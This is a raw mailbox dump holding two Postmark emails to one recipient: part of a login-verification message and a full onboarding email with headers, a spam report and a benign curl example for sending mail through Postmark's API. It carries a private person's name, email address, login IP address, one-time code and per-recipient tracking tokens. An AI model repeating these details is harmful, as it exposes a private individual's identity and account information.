href=3D"https://postmarkapp.com" style=3D"font-family: Helvetica Neu= e,Helvetica,Arial,sans-serif; color: #007bc8; text-decoration: underline;"> <img label=3D"Logo" src=3D"https://newsletter.postmarkapp.com/assets/= images/pm_logo@2x.png" width=3D"200" alt=3D"ActiveCampaign Postmark" style=3D= "margin-left: -27px; vertical-align: middle; border-style: none;"> </a> </td> </tr> <tr> <td class=3D"welcome" style=3D"font-family: Helvetica Neue,Helvetica,Aria= l,sans-serif; background-color: #fff; padding: 50px 50px 20px;"> =20 <p class=3D"welcome_greeting" style=3D"font-family: Helvetica Neue,Helvet= ica,Arial,sans-serif; line-height: 22px; text-align: left; margin-top: 0; f= ont-size: 21px; margin-bottom: 25px; color: #404040; font-weight: 700;">Hi = Rudolph.Perry,</p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;">We noticed someone just tried to log in to your = Postmark account. If this was you, please use the following code to confirm= it:</p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;"><code class=3D"one-time-code" style=3D"font-fami= ly: Andale Mono,Lucida Console,Courier,monospace,serif; color: #000; font-s= ize: 32px; letter-spacing: .1em;">409949</code></p> <p class=3D"sub" style=3D"font-family: Helvetica Neue,Helvetica,Arial,san= s-serif; line-height: 22px; text-align: left; margin-top: 0; font-size: 12p= x; margin-bottom: 25px; color: #404040;">This code is valid for 10 minutes.= </p> <div class=3D"panel panel--info" style=3D"margin-bottom: 30px; border-rad= ius: 4px; background-color: #f5fafd; text-align: center; padding: 15px; bor= der: 1px solid #deeef8;"> <h3 class=3D"panel_title panel_title--s" style=3D"font-family: Helvetic= a Neue,Helvetica,Arial,sans-serif; color: #272727; font-weight: 700; font-s= ize: 14px; text-align: left; margin: 0 0 .6em;">Login details:</h3> <ul class=3D"panel_body bulletless" style=3D"font-family: Helvetica Neu= e,Helvetica,Arial,sans-serif; line-height: 1.6; text-align: left; font-size= : 14px; padding-left: 0; list-style-type: none; color: #5a5a5a; margin: 0;"= > <li style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; = line-height: 1.6; text-align: left; font-size: 14px; color: #404040;"> <strong style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-s= erif;">Time:</strong> <time datetime=3D"2024-09-25T12:26:43+02:00">2024-09-25 12:26:43 +0= 200</time> </li> <li style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; = line-height: 1.6; text-align: left; font-size: 14px; color: #404040;"> <strong style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-s= erif;">IP:</strong> <code style=3D"font-family: Andale Mono,Lucida Console,Courier,mono= space,serif;">27.59.79.141</code> </li> </ul> </div> <h2 style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; marg= in-top: 0; color: #272727; font-weight: 700; text-align: left; font-size: 1= 6px;">Don=E2=80=99t recognize this activity?</h2> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;">If you didn=E2=80=99t initiate the login above, = please <a href=3D"https://account.postmarkapp.com/password_resets/new" styl= e=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; color: #007bc8= ; text-decoration: underline;">change your password</a> immediately and <a = href=3D"https://postmarkapp.com/support/article/1081-how-do-i-use-two-facto= r-authentication-2fa" style=3D"font-family: Helvetica Neue,Helvetica,Arial,= sans-serif; color: #007bc8; text-decoration: underline;">turn on two-factor= authentication</a> on your account.</p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;"><a class=3D"btn" href=3D"https://account.postmar= kapp.com/password_resets/new" style=3D"font-family: Helvetica Neue,Helvetic= a,Arial,sans-serif; color: #fff; text-decoration: none; background-color: #= 007bc8; font-size: 14px; display: inline-block; height: auto; border-radius= : 3px; font-weight: 700; text-align: center; -webkit-text-size-adjust: none= ; border-color: #007bc8; border-style: solid; border-width: 10px 18px;">Cha= nge your password</a></p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;">If you need any help, just reply to this email.<= /p> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-serif; line-= height: 22px; text-align: left; margin-top: 0; font-size: 14px; margin-bott= om: 25px; color: #404040;"> Thanks, <br>The Postmark Team <br><a href=3D"mailto:support@postmarkapp.com" style=3D"font-family: He= lvetica Neue,Helvetica,Arial,sans-serif; color: #007bc8; text-decoration: u= nderline;">support@postmarkapp.com</a> </p> </td> </tr> <tr> <td class=3D"follow-banner" style=3D"font-family: Helvetica Neue,Helvetic= a,Arial,sans-serif; background-color: #ffde00; padding: 15px 50px;"> <table class=3D"follow-banner_links" width=3D"100%" cellpadding=3D"0" c= ellspacing=3D"0" align=3D"right" valign=3D"middle" style=3D"border-collapse= : collapse; mso-table-lspace: 0; mso-table-rspace: 0; font-size: 14px; text= -align: center;"> <tr> <td class=3D"align-center" style=3D"font-family: Helvetica Neue,Hel= vetica,Arial,sans-serif; text-align: center;"> <span>Follow us on</span> <img src=3D"https://newsletter.postmark= app.com/assets/images/twitter-dark@2x.png" alt=3D"Twitter Logo" width=3D"18= " height=3D"15" style=3D"margin-bottom: -3px;"> <a href=3D"https://twitter.= com/postmarkapp" style=3D"font-family: Helvetica Neue,Helvetica,Arial,sans-= serif; color: #272727; text-decoration: underline;">Twitter</a> and <img sr= c=3D"https://newsletter.postmarkapp.com/assets/images/linkedin-dark@2x.png"= alt=3D"LinekdIn Logo" width=3D"15" height=3D"15" style=3D"margin-bottom: -= 3px;"> <a href=3D"https://www.linkedin.com/company/postmarkapp" style=3D"fo= nt-family: Helvetica Neue,Helvetica,Arial,sans-serif; color: #272727; text-= decoration: underline;">LinkedIn</a> </td> </tr> </table> </td> </tr> <tr> <td class=3D"footer" style=3D"font-family: Helvetica Neue,Helvetica,Arial= ,sans-serif; font-size: 14px; background-color: #3b4049; color: #fff; paddi= ng: 0 50px;"> <p style=3D"color: #FFF; text-align: center; font-family: Helvetica Neu= e,Helvetica,Arial,sans-serif; line-height: 22px; font-size: 14px; margin: 1= 2px 0;">=F0=9F=92=8C <a href=3D"https://postmarkapp.com/newsletter" style=3D"color: rgba(2= 55, 255,255, .5); font-family: Helvetica Neue,Helvetica,Arial,sans-serif; t= ext-decoration: underline;">Subscribe to the Postmark newsletter</a> </p> </td> </tr> </table> </td> </tr> <tr> <td class=3D"footer footer--slim" style=3D"font-family: Helve= tica Neue,Helvetica,Arial,sans-serif; font-size: 14px; background-color: #e= eece4; color: #fff; border-top-width: 0; padding: 16px 50px;"> <p style=3D"font-family: Helvetica Neue,Helvetica,Arial,san= s-serif; line-height: 22px; text-align: center; font-size: 14px; color: #b0= aea7; margin: 0;"><a href=3D"https://www.activecampaign.com/?utm_source=3Dp= ostmark&utm_medium=3Demail" target=3D"_blank" style=3D"font-family: Hel= vetica Neue,Helvetica,Arial,sans-serif; color: #b0aea7; text-decoration: un= derline;">ActiveCampaign</a> LLC, 1 North Dearborn St, 5th Floor, Chicago, = IL 60602</p> </td> </tr> </table> </td> </tr> </table> </body> </html> --mk3-fd03bba5f0704f6d94571cbcd77bfe9d-- PK }��Y�5� B 1727097381.M152545P849358.mgh-web11.maghost.ro,S=66053,W=66866:2,Snu ��٘� Return-Path: <bounce-2696927-51-467499-rudolph.perry=bloomingcostamices.com@ac-bounces.fyi.postmarkapp.com> Delivered-To: rudolph.perry@bloomingcostamices.com Received: from mgh-web11.maghost.ro by mgh-web11.maghost.ro with LMTP id sGIcCCVq8WbO9QwAJwI5NA (envelope-from <bounce-2696927-51-467499-rudolph.perry=bloomingcostamices.com@ac-bounces.fyi.postmarkapp.com>) for <rudolph.perry@bloomingcostamices.com>; Mon, 23 Sep 2024 16:16:21 +0300 Return-path: <bounce-2696927-51-467499-rudolph.perry=bloomingcostamices.com@ac-bounces.fyi.postmarkapp.com> Envelope-to: rudolph.perry@bloomingcostamices.com Delivery-date: Mon, 23 Sep 2024 16:16:21 +0300 Received: from d82.asa.acemsd2.com ([52.128.41.226]:44358) by mgh-web11.maghost.ro with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384 (Exim 4.97.1) (envelope-from <bounce-2696927-51-467499-rudolph.perry=bloomingcostamices.com@ac-bounces.fyi.postmarkapp.com>) id 1ssivL-00000003Z9I-2QnH for rudolph.perry@bloomingcostamices.com; Mon, 23 Sep 2024 16:16:21 +0300 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; s=acdkim1; d=fyi.postmarkapp.com; h=To:From:Subject:Date:MIME-Version:Content-Type:Content-Transfer-Encoding: Feedback-ID:List-Unsubscribe:List-Unsubscribe-Post:Message-ID; i=hello@fyi.postmarkapp.com; bh=6YaVtvTR30I4ORQ7CJFfzXy+B+Y22qpqBO9N/Rs0Dn0=; b=fNLkgrP464IiI98hykAV9oT50yThSfARdDF+m8lNdJiHecjfTnFiWWhoA6JTqf3cBGdN5riefyly 4fSYLpfYXrWUwWfMkmD6oE6Vrpi1dmgyqjVXslEGX62IivfF5jS64XbbsG9NaBK2dhP+pigcpUD+ 7B4y+mzv+HskS7/7nozD4tYXlAIMq3Z4kti7GSrH61aEREaexWotWZls+YTl0Vmfe8/sGIvt+iG+ rwozAzULa7RFKodcvlo7AeFXb7wJs/wZ1wBFuQkowPwJthHyA7coF7M+RxCuLO3/gGXZfmuSKGPk lNwOH2l9rXgAbAvG80SNEPbOztTIl/zxmA8eqQ== Received: by d82.asa.acemsd2.com id hu5kvi36bm4f for <rudolph.perry@bloomingcostamices.com>; Mon, 23 Sep 2024 13:15:36 +0000 (envelope-from <bounce-2696927-51-467499-rudolph.perry=bloomingcostamices.com@ac-bounces.fyi.postmarkapp.com>) X-Mailer: ActiveCampaign Mailer CFBL-Address: fbl-report@acems1.com; report=arf To: rudolph.perry@bloomingcostamices.com From: "Postmark" <hello@fyi.postmarkapp.com> Subject: Let's send an email Date: Mon, 23 Sep 2024 08:15:36 -0500 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="_=_swift-160317694066f169f89b96a4.53478661_=_" Content-Transfer-Encoding: 7bit X-Report-Abuse: Please report abuse here: abuse@acemserv.com X-mid: cnVkb2xwaC5wZXJyeUBibG9vbWluZ2Nvc3RhbWljZXMuY29tICwgYzUxICwgbTg1ICwgczMwNzQ x-virtual-mta: d82.asa.acemsd2.com Feedback-ID: 2696927:2696927.51:d82.asa.acemsd2.com:activecampaign X-250ok-CID: 2696927-51 List-Unsubscribe: <https://postmark.activehosted.com/box.php?nl=3&c=51&m=85&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&funcml=unsub2&luha=1>,<mailto:unsubscribe-d4187fdf6cd8226b437d427b69435271-51-83f3d2f8c2e1fe9a4fb88e34e59f8c08@out.activecampaign.com> List-Unsubscribe-Post: List-Unsubscribe=One-Click X-DKIM-Options: s=acdkim1 Message-ID: <0.1.BE.841.1DB0DBAADD40790.0@d82.asa.acemsd2.com> X-Spam-Status: No, score=-0.1 X-Spam-Score: 0 X-Spam-Bar: / X-Ham-Report: Spam detection software, running on the system "mgh-web11.maghost.ro", has NOT identified this incoming email as spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: Two simple ways to send your first email with Postmark � [...] Content analysis details: (-0.1 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- -0.0 SPF_PASS SPF: sender matches SPF record -0.0 SPF_HELO_PASS SPF: HELO matches SPF record -0.1 DKIM_VALID Message has at least one valid DKIM or DK signature -0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's domain 0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid 0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or identical to background 0.0 HTML_MESSAGE BODY: HTML included in message X-Spam-Flag: NO --_=_swift-160317694066f169f89b96a4.53478661_=_ Content-Type: text/plain; charset=utf-8 Two simple ways to send your first email with Postmark Having trouble viewing this email? Read it online https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZwb3N0bWFyay5hY3RpdmVob3N0ZWQuY29tJTJGcF92LnBocCUzRmwlM0QzJTI2YyUzRDUxJTI2bSUzRDg1JTI2cyUzRDgzZjNkMmY4YzJlMWZlOWE0ZmI4OGUzNGU1OWY4YzA4&sig=FRM1YbwJQb3ZzZihcZKkvfJZBLcSwS2tQUxJPE2WhQ7&iat=1727097336&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=blV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=51A85A3A200 https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZkZXZlbG9wZXIlM0Z1dG1fc291cmNlJTNEYWN0aXZlaG9zdGVkJTI2dXRtX21lZGl1bSUzRGVtYWlsJTI2dXRtX2NhbXBhaWduJTNEcG1fMjAyMzA3X29uYm9hcmRpbmctdjFfZTE=&sig=F2EA25dnMZqJz6ErC62MDgY1EHCsymx4iJadLDf2f3jJ&iat=1727097336&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=blV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=51A85A3A256 **Hi Friend,** Are you ready to put your new Postmark account to work? Because we're ready to get your emails delivered! Let's get started by sending a test email to your inbox. Here are two quick and simple ways to do that: ****1. Send your first email using cURL**** curl "https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZhcGkucG9zdG1hcmthcHAuY29tJTJGZW1haWw=&sig=6zeZiDRuJ6vuoAPFiYnGgKhCQr427q7o3DZQbwmREHh4&iat=1727097336&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=blV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=51A85A3A206 https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZhcGkucG9zdG1hcmthcHAuY29tJTJGZW1haWw=&sig=6zeZiDRuJ6vuoAPFiYnGgKhCQr427q7o3DZQbwmREHh4&iat=1727097336&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=blV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=51A85A3A206" \ -X POST \ -H "Accept: application/json" \ -H "Content-Type: application/json" \ -H "X-Postmark-Server-Token: server token" \ -d '{ "From": "sender@example.com mailto:sender@example.com", "To": "receiver@example.com mailto:receiver@example.com", "Subject": "Postmark test", "TextBody": "Hello dear Postmark user.", "HtmlBody": " **Hello** dear Postmark user.", "MessageStream": "outbound" }' Run this simple cURL command https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZtYW51YWwlM0Z1dG1fc291cmNlJTNEYWN0aXZlaG9zdGVkJTI2dXRtX21lZGl1bSUzRGVtYWlsJTI2dXRtX2NhbXBhaWduJTNEcG1fMjAyMzA3X29uYm9hcmRpbmctdjFfZTElMjNzZW5kLXRlc3Qtd2l0aC1jdXJs&sig=H3wvaEJRWSfbWdqziuhvnPGNwRpToHnHn97TsuvY935u&iat=1727097336&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=blV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=51A85A3A261 in your terminal to send your first email. Just add in: * your Postmark Server API Token (here's how to find that https://postmarkapp.com/support/article/811-what-are-the-smtp-details-api-tokens-i-should-be-using?utm_source=activehosted&utm_medium=email&utm_campaign=pm_202307_onboarding-v1_e1) * a verified email address you can send from in the "From" field * and a recipient email address to receive your test email (remember, you can only send to verified domains until you've requested account approval) And then see if you can navigate to your inbox faster than we can deliver your email. Grab the cURL command → https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZtYW51YWwlM0Z1dG1fc291cmNlJTNEYWN0aXZlaG9zdGVkJTI2dXRtX21lZGl1bSUzRGVtYWlsJTI2dXRtX2NhbXBhaWduJTNEcG1fMjAyMzA3X29uYm9hcmRpbmctdjFfZTElMjNzZW5kLXRlc3Qtd2l0aC1jdXJs&sig=H3wvaEJRWSfbWdqziuhvnPGNwRpToHnHn97TsuvY935u&iat=1727097336&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=blV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=51A85A3A261 ****2. Send an email using the API explorer**** https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZhcGktZXhwbG9yZXIlM0ZhcGktdHlwZSUzRHNlcnZlciUyMyUyNnV0bV9zb3VyY2UlM0RhY3RpdmVob3N0ZWQlMjZ1dG1fbWVkaXVtJTNEZW1haWwlMjZ1dG1fY2FtcGFpZ24lM0RwbV8yMDIzMDdfb25ib2FyZGluZy12MV9lMQ==&sig=4t6uQXN2sCy92d5Vosq1kWbKFCyoySH5fgkFJP7Uc9ZW&iat=1727097336&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=blV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=51A85A3A253 Quickly execute your first API call to send an email from your web browser with our nifty API explorer. The API Explorer shows you the request and response format, so it's a great resource for testing out any calls to Postmark's APIs. Try the API explorer → https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZhcGktZXhwbG9yZXIlM0ZhcGktdHlwZSUzRHNlcnZlciUyMyUyNnV0bV9zb3VyY2UlM0RhY3RpdmVob3N0ZWQlMjZ1dG1fbWVkaXVtJTNEZW1haWwlMjZ1dG1fY2FtcGFpZ24lM0RwbV8yMDIzMDdfb25ib2FyZGluZy12MV9lMQ==&sig=4t6uQXN2sCy92d5Vosq1kWbKFCyoySH5fgkFJP7Uc9ZW&iat=1727097336&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=blV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=51A85A3A253 **I don't need an API. How do I send via SMTP?** We've got you covered too, friend! Learn how to get started with Postmark's SMTP service. https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZkZXZlbG9wZXIlMkZ1c2VyLWd1aWRlJTJGc2VuZC1lbWFpbC13aXRoLXNtdHAlM0Z1dG1fc291cmNlJTNEYWN0aXZlaG9zdGVkJTI2dXRtX21lZGl1bSUzRGVtYWlsJTI2dXRtX2NhbXBhaWduJTNEcG1fMjAyMzA3X29uYm9hcmRpbmctdjFfZTE=&sig=6raYLPevDkK69g3yqfKwwt2FDn5e1sjK8yN2kM2hX2az&iat=1727097336&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=blV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=51A85A3A254 **Why can I only send test emails to domains I verified?** This means your account is currently in test mode. That allows you to get familiar with Postmark, and send up to 100 emails to domains that you've verified. Once you're ready to send emails to others, we'll need to approve your account. Why? Reviewing each account helps us tell the responsible senders (that's you!) apart from the spammers (boo!), so we can maintain our stellar deliverability rates for all customers. So whenever you're ready, submit an approval request https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZhY2NvdW50LnBvc3RtYXJrYXBwLmNvbSUyRmFjY291bnRfYXBwcm92YWwlMkZhcHBseSUzRnV0bV9zb3VyY2UlM0RhY3RpdmVob3N0ZWQlMjZ1dG1fbWVkaXVtJTNEZW1haWwlMjZ1dG1fY2FtcGFpZ24lM0RwbV8yMDIzMDdfb25ib2FyZGluZy12MV9lMQ==&sig=49NM9JG65bV6J51RhvL6cSZmv77PwzYiPgsTGaLRBcZx&iat=1727097336&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=blV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=51A85A3A255. Do you have any questions? Just reply to this email. We're here to help. **Was this email helpful? ** Nope https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZ0aGFuay15b3UtZm9yLXZvdGluZyUzRnV0bV9zb3VyY2UlM0RhY3RpdmVob3N0ZWQlMjZ1dG1fbWVkaXVtJTNEZW1haWwlMjZ1dG1fY2FtcGFpZ24lM0RwbV8yMDIzMDdfb25ib2FyZGluZy12MV9lMSUyNnV0bV9jb250ZW50JTNEbm8=&sig=5T4rtkzizjiSuYhYJamf9n7hE2gbob4aVwniRuApMQxb&iat=1727097336&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=blV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=51A85A3A209 ❤️ Yes https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZ0aGFuay15b3UtZm9yLXZvdGluZyUzRnV0bV9zb3VyY2UlM0RhY3RpdmVob3N0ZWQlMjZ1dG1fbWVkaXVtJTNEZW1haWwlMjZ1dG1fY2FtcGFpZ24lM0RwbV8yMDIzMDdfb25ib2FyZGluZy12MV9lMSUyNnV0bV9jb250ZW50JTNEeWVz&sig=AqMRjjJmABGE5DYwqNFRaGT3CPapJKqNz6LcbVGrDsrr&iat=1727097336&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=blV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=51A85A3A210 Postmark, 1 North Dearborn St, 5th floor, Chicago, IL 60602, United States Read this online https://postmark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZwb3N0bWFyay5hY3RpdmVob3N0ZWQuY29tJTJGcF92LnBocCUzRmwlM0QzJTI2YyUzRDUxJTI2bSUzRDg1JTI2cyUzRDgzZjNkMmY4YzJlMWZlOWE0ZmI4OGUzNGU1OWY4YzA4&sig=FRM1YbwJQb3ZzZihcZKkvfJZBLcSwS2tQUxJPE2WhQ7&iat=1727097336&a=%7C%7C477586617%7C%7C&account=postmark%2Eactivehosted%2Ecom&email=blV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=51A85A3A200 - Unsubscribe https://postmark.activehosted.com/proc.php?nl=3&c=51&m=85&s=83f3d2f8c2e1fe9a4fb88e34e59f8c08&act=unsub&runid=606393 --_=_swift-160317694066f169f89b96a4.53478661_=_ Content-Type: text/html; charset=utf-8 Content-Transfer-Encoding: quoted-printable <!DOCTYPE html><html>=0A<head><meta http-equiv=3D"Content-Type" content=3D"= text/html; charset=3Dutf-8"><meta name=3D"viewport" content=3D"width=3Ddevi= ce-width, minimal-ui, initial-scale=3D1.0, maximum-scale=3D1.0, user-scalab= le=3D0;"><meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge"><meta n= ame=3D"format-detection" content=3D"telephone=3Dno, date=3Dno, email=3Dno, = address=3Dno"><meta name=3D"x-apple-disable-message-reformatting">=0A<!--[i= f (mso 16)]><style type=3D"text/css"> a { text-decoration: none; } </style>= <![endif]--> =0A<!--[if gte mso 9]><style> sup { font-size: 100% !important= ; } </style><![endif]--> =0A<!--[if gte mso 9]><xml><o:OfficeDocumentSettin= gs><o:AllowPNG></o:AllowPNG><o:PixelsPerInch>96</o:PixelsPerInch></o:Office= DocumentSettings></xml><![endif]--> =0A<!--[if gte mso 9]><style>sup { font= -size: 100% !important; }</style><![endif]--> =0A<!--[if !mso]><!-- --><lin= k href=3D"https://fonts.googleapis.com/css?family=3DRoboto:400,400i,700,700= i" rel=3D"stylesheet"> =0A<!--<![endif]--><style type=3D"text/css">#outlook= a { padding:0;}.es-button { mso-style-priority:100!important; text-decorat= ion:none!important;}a[x-apple-data-detectors] { color:inherit!important; te= xt-decoration:none!important; font-size:inherit!important; font-family:inhe= rit!important; font-weight:inherit!important; line-height:inherit!important= ;}.es-desk-hidden { display:none; float:left; overflow:hidden; width:0; max= -height:0; line-height:0; mso-hide:all;}=0A@media only screen and (max-widt= h:600px) {p, ul li, ol li, a { line-height:150%!important } h1, h2, h3, h1 = a, h2 a, h3 a { line-height:120% } h1 { font-size:22px!important; text-alig= n:left!important } h2 { font-size:20px!important; text-align:left!important= } h3 { font-size:18px!important; text-align:left!important } .es-header-bo= dy h1 a, .es-content-body h1 a, .es-footer-body h1 a { font-size:22px!impor= tant; text-align:left!important } .es-header-body h2 a, .es-content-body h2= a, .es-footer-body h2 a { font-size:20px!important; text-align:left!import= ant } .es-header-body h3 a, .es-content-body h3 a, .es-footer-body h3 a { f= ont-size:18px!important; text-align:left!important } .es-menu td a { font-s= ize:13px!important } .es-header-body p, .es-header-body ul li, .es-header-b= ody ol li, .es-header-body a { font-size:12px!important }=0A .es-content-bo= dy p, .es-content-body ul li, .es-content-body ol li, .es-content-body a { = font-size:16px!important } .es-footer-body p, .es-footer-body ul li, .es-fo= oter-body ol li, .es-footer-body a { font-size:12px!important } .es-infoblo= ck p, .es-infoblock ul li, .es-infoblock ol li, .es-infoblock a { font-size= :12px!important } *[class=3D"gmail-fix"] { display:none!important } .es-m-t= xt-c, .es-m-txt-c h1, .es-m-txt-c h2, .es-m-txt-c h3 { text-align:center!im= portant } .es-m-txt-r, .es-m-txt-r h1, .es-m-txt-r h2, .es-m-txt-r h3 { tex= t-align:right!important } .es-m-txt-l, .es-m-txt-l h1, .es-m-txt-l h2, .es-= m-txt-l h3 { text-align:left!important } .es-m-txt-r img, .es-m-txt-c img, = .es-m-txt-l img { display:inline!important } .es-button-border { display:in= line-block!important } a.es-button, button.es-button { font-size:14px!impor= tant; display:inline-block!important } .es-adaptive table, .es-left, .es-ri= ght { width:100%!important }=0A .ac-footer, .es-content table, .es-header t= able, .es-footer table, .es-content, .es-footer, .es-header { width:100%!im= portant; max-width:600px!important } .ac-footer td, .ac-footer p, .es-adapt= -td { display:block!important; width:100%!important } .adapt-img { width:10= 0%!important; height:auto!important } .es-m-p0 { padding:0px!important } .e= s-m-p0r { padding-right:0px!important } .es-m-p0l { padding-left:0px!import= ant } .es-m-p0t { padding-top:0px!important } .es-m-p0b { padding-bottom:0!= important } .es-m-p20b { padding-bottom:20px!important } .es-mobile-hidden,= .es-hidden { display:none!important } tr.es-desk-hidden, 